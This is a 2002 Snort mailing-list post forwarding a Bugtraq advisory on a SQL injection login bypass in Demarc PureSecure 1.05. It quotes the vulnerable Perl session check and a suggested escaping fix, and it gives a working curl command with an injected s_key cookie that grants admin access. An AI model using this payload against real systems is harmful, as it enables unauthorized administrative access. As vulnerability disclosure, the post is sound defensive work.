Snort mailing list archives
FW: Demarc PureSecure 1.05 may be other (user can bypass login)
From: Ryan Hill <rhill () xypoint com>
Date: Tue, 16 Apr 2002 10:03:43 -0700
fyi, I haven't had a chance to test this yet, just hit another list and wanted to pass it along... -----Original Message----- From: pokleyzz sakamaniaka [mailto:pokleyzz () hotmail com] Sent: Monday, April 15, 2002 12:32 AM To: bugtraq () securityfocus com Subject: Demarc PureSecure 1.05 may be other (user can bypass login) Demarc PureSecure (http://www.demarc.org) is an all-inclusive network monitoring solution that allows you to monitor an entire network of servers from one powerful web interface. user can bypass login and get admin status by sql injection through cookies s_key --------- line 319 ------------------------------ elsif (($cookies{'s_key'}) && ($cookies{'s_key'}-
value)){
$logged_in_as = &check_login($cookies
{'s_key'}->value);
if (!$logged_in_as){
&print_login_screen;
&safe_exit;
}
-----------------------------------------------------
s_key = will be use for sql in fuction check_login
query ( line 6114)
---------lini 6114---------------------------------
$sql_query = " SELECT \
f1,f2,f3,admin,username,UNIX_TIMESTAMP
(current_login_timedate) AS LOGINTIME \
FROM \
dm_sessions \
WHERE current_session_id
= '$session_id' ";
-----------------------------------------------------
-=solution=-
line 6113: &safe_slash(\$session_id' );
using curl (http://curl.haxx.se/download/):
curl -b s_key=\'%20OR%20current_session_id%
20like%20\'%\'%23 https://<lame host>/dm/demarc
http://www.inetd-secure.net
http://www.mybsd.org
_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- FW: Demarc PureSecure 1.05 may be other (user can bypass login) Ryan Hill (Apr 16)